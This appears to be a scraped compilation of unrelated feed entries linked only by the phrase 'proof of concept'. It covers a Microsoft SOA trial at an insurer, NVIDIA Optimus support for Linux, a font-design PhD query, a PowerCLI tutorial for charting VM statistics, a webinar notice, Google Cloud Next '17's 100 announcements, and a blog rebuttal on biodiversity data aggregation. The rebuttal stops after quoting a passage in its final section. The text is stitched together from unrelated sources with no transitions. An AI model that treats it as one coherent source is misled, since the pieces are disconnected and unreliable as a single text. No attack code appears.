The Huurcommissie compared the products of several vendors, including SAP, Oracle and Microsoft. It did so by means of a Proof of Concept (POC). One of the participating parties was QS Solutions, a company based in Amersfoort. Leo Rietbergen of QS Solutions: "Our proposal was a solution based on Microsoft Dynamics CRM 4.0 and SharePoint Server 2007."
          DBV Verzekeringen builds SOA implementation with a software factory based on the Microsoft .NET Framework 3.5
DBV Verzekeringen operates as an independent insurer, under its own name, within the SNS REAAL group and specializes in flexible life insurance and mortgages. As a proof of concept, the insurance company rebuilt an existing business process in an SOA architecture, complete with workflow support. This was done using a software factory based on the Microsoft application platform. It not only gave more insight into the development process; the approach also led to higher productivity and higher quality. The project successfully demonstrated that an SOA solution for automating business processes based on Microsoft technology fits the customer's wishes and requirements well. André Ruiter, ICT Architect at DBV Verzekeringen: "The trial has shown that different systems can be connected within a process, regardless of the technology they were developed in and their physical location. Developing and publishing services also becomes simpler, because the relationships with other systems are clearly delineated."

The status of the project is visible at all times to all project members and stakeholders. André Ruiter: "The greatest added value of using Visual Studio Team System is the increased insight into the development process. That gives you more grip on the project, which benefits productivity. The service templates in Visual Studio also contributed to productivity, because they work flawlessly and saved us a lot of time." Asked to express the benefits of the software factory in a single number, the IT Architect answers: "The higher productivity in your software factory means a shorter time to market for new developments that you want to roll out. We expect to achieve an efficiency improvement of about 30%."
          NVIDIA working on Linux support for Optimus automatic graphics switching        

Linux godfather Linus Torvalds may have a frosty relationship with NVIDIA, but that hasn't stopped the company from improving its hardware's support for the open-source operating system. In fact, the chipset-maker is working on the OS' compatibility with its Optimus graphics switching tech, which would enable laptops to conserve power by swapping between discrete and integrated graphics on the fly. In an email sent to a developer listserv, NVIDIA software engineer Aaron Plattner revealed that he's created a working proof of concept with a driver. There's no word on when the Tux-loving masses may see Optimus support, but we imagine that day can't come soon enough for those who want better battery life while gaming on their mobile machines.

Via: PC World

Source: Gmane


          Multiweight script families - Help with PhD        

Hello everyone,
I am currently writing a dissertation on type technology, focused on developing a workflow for creating multiweight script/cursive families using Multiple Master technology and some Metafont/Metapost techniques. To be more precise, my objective is to help the designer create calligraphy and brush scripts – the kind whose weight cannot simply be changed without a complete redrawing (you can't just move stems around).

The basic concept is to allow the artist to draw his characters in whatever software he chooses. When he/she is satisfied with the result, he imports the centerlines into whatever font production software he uses, activates the script, enters the brush parameters and receives two masters with clean outlines, a minimum number of points, compliance with PS drawing standards, etc. It sounds simple and it actually is – I have managed to create a working model written in Python (a proof of concept) and I am currently using it for font development.

As you all know, having a working model does not complete a dissertation. As I am currently writing the first chapter of my monograph, I am struggling with the following problem: I cannot seem to find any other authors who have worked on the same subject – multiweight script/cursive families. I know there must be at least a couple of authors who have addressed the problem in the past. So could you please point me to some articles or books on the subject?

Thank you in advance!
Vassil


          VMware: VM stats using PowerCLI and Google Charts        
Let me start today's post by pointing out that this is more a proof of concept than a real thing, but I hope this piece of code gives you an idea of how many different tasks can be accomplished using PowerCLI and how versatile its reporting capabilities are. After producing fancy reports using PowerCLI, why not also include some charts in them?

This can easily be accomplished by using Google Charts: pieces of JavaScript code that generate charts/tables just by passing data to them; the resulting charts can be embedded in web pages.

The idea behind this PowerCLI script is to generate an HTML page and retrieve stats from an entity (a virtual machine) by using the Get-Stat cmdlet. These stats will be passed as data upon which charts will be created.

If you have a look at the code of a sample chart, for example a donut chart, you can slice it up into three different areas: a header in which the JavaScript function is defined; a body, the most important part, in which you insert all the data and some options like the title, the measures to be used on the x and y axes, etc.; and a third and final part, a sort of footer, in which the JavaScript and HTML tags are closed.

The PowerCLI cmdlet Get-Stat retrieves stats from any powered-on virtual machine:

 Get-Stat -Entity (Get-VMHost -Name 10.0.1.62 | Get-VM | Where-Object PowerState -match "PoweredOn") -Stat $stat -Start (Get-Date).AddHours(-24) -MaxSamples (10) -IntervalMins 10 | Measure-Object Value -Average  

Where:

-Entity: the object you want to retrieve stats from. This could be a datacenter, a virtual machine, a host, etc. The line above retrieves stats for all powered-on VMs running on host 10.0.1.62.
-Stat: the statistic you want to retrieve.

The following values are accepted:

cpu.usage.average
cpu.usagemhz.average
mem.usage.average
disk.usage.average
net.usage.average
sys.uptime.latest

-Start: the start time of the statistics retrieval
-MaxSamples: how many samples to consider for the measurement
-IntervalMins: the amount of time that separates two consecutive measurements
-Measure-Object Value: we specify that this value will be used as the measure.
-Average: how this measure will be aggregated. Average, Maximum and Minimum are accepted values. Average takes the average of all collected samples. Please note that for each of the available stats the Average value is a good indicator, since the average usage of CPU, memory, disk or network over a period of time is a good indicator of how well the measured entity performs. sys.uptime.latest is the only measure for which the average is not suited, since we only need the last value of the uptime; in this case Maximum is the correct way to measure it.

The output produced by the PowerCLI script is an HTML file, which means you can style it by applying a proper CSS.

This is an example of a chart report I generated:



The following is the sample PowerCLI code used to generate a donut chart; as usual, you can also find it on my GitHub repository: Stats using Google charts.ps1



As you can see, this time the HTML page is generated by simply concatenating the variables $htmlheader, $data and $htmlfooter, which contain the HTML code. This is another, though less elegant, way to generate the HTML page. Alternatively, you can use the ConvertTo-Html cmdlet as in fancy reports using PowerCLI.
          Enabled-First-in-Human™ – Accelerating Your Programs into Clinic and Through to Proof of Concept (PoC), New Webinar Hosted by Xtalks        

This webinar will describe the Translational Pharmaceutics™ platform and present Enabled-First-in-Human case studies to illustrate how it has been applied in early stage drug development programs. There will be two live broadcasts on Wednesday July 9, 2014, at 9am EDT/2pm BST, and at 12pm EDT/5pm BST.

(PRWeb June 25, 2014)

Read the full story at http://www.prweb.com/releases/2014/06/prweb11966812.htm


          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to an end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud, with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:


Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.


Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing resistant Security Key and is easier to setup than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).


New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines has new support for restarting failed jobs (including automatic restart as needed) in beta, the ability to create single-node clusters for lightweight sandbox development, in beta, GPU support, and the cloud labels feature, for more flexibility managing your Dataproc resources, is now GA.


New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for PostgreSQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).


New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.


New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’ve introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.


New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google AppEngine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.


Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64 and up to 416GB of memory per instance.

43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.


In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer. With Drive File Stream, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.

100-announcements-17

Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly in a third-party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.

100-announcements-2

Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and is making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to scale reliably while keeping costs low, perform under heavy loads, and consistently deliver sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.

100-announcements-3

We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training courses. To celebrate this announcement, Coursera is offering all NEXT attendees a 100% discount for the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investments are available to qualified partners in the form of low interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs; including, low interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP including Autotranslate via Translate API, integration with Vision API to screen for inappropriate content, integration with the NLP API to perform sentiment analysis on public channels, integration with G Suite for authentication, and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program- We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)



          Response to To Increase Trust, Change the Social Design Behind Aggregated Biodiversity Data        

Nico Franz and Beckett W. Sterner recently published a preprint entitled "To Increase Trust, Change the Social Design Behind Aggregated Biodiversity Data" on bioRxiv (http://dx.doi.org/10.1101/157214). Below is the abstract:

Growing concerns about the quality of aggregated biodiversity data are lowering trust in large-scale data networks. Aggregators frequently respond to quality concerns by recommending that biologists work with original data providers to correct errors "at the source". We show that this strategy falls systematically short of a full diagnosis of the underlying causes of distrust. In particular, trust in an aggregator is not just a feature of the data signal quality provided by the aggregator, but also a consequence of the social design of the aggregation process and the resulting power balance between data contributors and aggregators. The latter have created an accountability gap by downplaying the authorship and significance of the taxonomic hierarchies - frequently called "backbones" - they generate, and which are in effect novel classification theories that operate at the core of data-structuring process. The Darwin Core standard for sharing occurrence records plays an underappreciated role in maintaining the accountability gap, because this standard lacks the syntactic structure needed to preserve the taxonomic coherence of data packages submitted for aggregation, leading to inferences that no individual source would support. Since high-quality data packages can mirror competing and conflicting classifications, i.e., unsettled systematic research, this plurality must be accommodated in the design of biodiversity data integration. Looking forward, a key directive is to develop new technical pathways and social incentives for experts to contribute directly to the validation of taxonomically coherent data packages as part of a greater, trustworthy aggregation process.

Below I respond to some specific points that annoyed me about this article, at the end I try and sketch out a more constructive response. Let me stress that although I am the current Chair of the GBIF Science Committee, the views expressed here are entirely my own.

Trust and social relations

Trust is a complex and context-sensitive concept...First, trust is a dependence relation between a person or organization and another person or organization. The first agent depends on the second one to do something important for it. An individual molecular phylogeneticist, for example, may rely on GenBank (Clark et al. 2016) to maintain an up-to-date collection of DNA sequences, because developing such a resource on her own would be cost prohibitive and redundant. Second, a relation of dependence is elevated to being one of trust when the first agent cannot control or validate the second agent's actions. This might be because the first agent lacks the knowledge or skills to perform the relevant task, or because it would be too costly to check.

Trust is indeed complex. I found this part of the article to be fascinating, but incomplete. The social network GBIF operates in is much larger than simply taxonomic experts and GBIF; there are relationships with data providers, other initiatives, a broad user community, government agencies that approve its continued funding, and so on. Some of the decisions GBIF makes need to be seen in this broader context.

For example, the article challenges GBIF for responding to errors in the data by saying that these should be "corrected at source". This is a political statement, given that data providers are anxious not to cede complete control of their data to aggregators. Hence the model that GBIF users see errors, those errors get passed back to the source (the mechanisms for this are mostly non-existent), the source fixes them, then the aggregator re-harvests. This model makes assumptions about whether sources are either willing or able to fix these errors that I think are not really true. But the point is this is less about not taking responsibility, and more about avoiding treading on toes by taking too much responsibility. Personally I think GBIF should take responsibility for fixing a lot of these errors, because it is GBIF whose reputation suffers (as demonstrated by Franz and Sterner's article).

Scalability

A third step is to refrain from defending backbones as the only pragmatic option for aggregators (Franz 2016). The default argument points to the vast scale of global aggregation while suggesting that only backbones can operate at that scale now. The argument appears valid on the surface, i.e., the scale is immense and resources are limited. Yet using scale as an obstacle it is only effective if experts were immediately (and unreasonably) demanding a fully functional, all data-encompassing alternative. If on the other hand experts are looking for token actions towards changing the social model, then an aggregator's pursuit of smaller-scale solutions is more important than succeeding with the 'moonshot'.

Scalability is everything. GBIF is heading towards a billion occurrence records and several million taxa (particularly as more and more taxa from DNA barcoding are added). I'm not saying that tractability trounces trust, but it is a major consideration. Anybody advocating a change has got to think about how these changes will work at scale.

I'm conscious that this argument could easily be used to swat away any suggestion ("nice idea, but won't scale") and hence be a reason to avoid change. I myself often wish GBIF would do things differently, and run into this problem. One way around it is to make use of the fact that GBIF has some really good APIs, so if you want GBIF to do something different you can build a proof of concept to show what could be done. If that is sufficiently compelling, then the case for trying to scale it up is going to be much easier to make.
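To make that concrete, here is the sort of minimal proof-of-concept sketch I mean, using the public GBIF v1 API (the endpoints and field names below are assumptions taken from its public documentation, so check them against the current docs):

import json
import urllib2  # Python 2

# resolve a name against the GBIF backbone, then pull a few occurrence records
name = "Puma concolor"
match = json.load(urllib2.urlopen(
    "https://api.gbif.org/v1/species/match?name=" + name.replace(" ", "%20")))
key = match["usageKey"]

occ = json.load(urllib2.urlopen(
    "https://api.gbif.org/v1/occurrence/search?taxonKey=%d&limit=5" % key))
print occ["count"], "occurrence records for", name
for rec in occ["results"]:
    print rec.get("datasetKey"), rec.get("country"), rec.get("eventDate")

A dozen or so lines like this are often enough to demonstrate an idea before anyone has to worry about whether it scales.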

Multiple classifications

As a social model, the notion of backbones (Bisby 2000) was misguided from the beginning. They disenfranchise systematists who are by necessity consensus-breakers, and distort the coherence of biodiversity data packages that reflect regionally endorsed taxonomic views. Henceforth, backbone-based designs should be regarded as an impediment to trustworthy aggregation, to be replaced as quickly and comprehensively as possible. We realize that just saying this will not make backbones disappear. However, accepting this conclusion counts as a step towards regaining accountability.

